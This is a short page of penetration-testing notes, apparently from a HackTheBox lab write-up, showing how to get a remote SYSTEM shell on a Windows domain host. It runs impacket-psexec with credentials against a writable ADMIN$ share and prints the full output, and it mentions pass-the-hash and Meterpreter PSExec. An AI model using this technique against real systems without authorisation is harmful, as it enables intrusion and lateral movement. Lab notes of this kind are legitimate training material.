AD Shell

Getting Shell

Now we have writable shares and credentials so, we can use psexec to get the shell as well.

impacket-scripts | Kali Linux ToolsKali Linux

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-psexec active.htb/[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file QDdDNPEh.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service REEo on 10.10.10.100.....
[*] Starting service REEo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Pass the hash using Psexec

Meterpreter PSExec

We can also use Meterpreter PSexec to connect with the target. Can also pass the hash

PreviousAS-REP roasting NextAD Enumeration

Last updated 8 months ago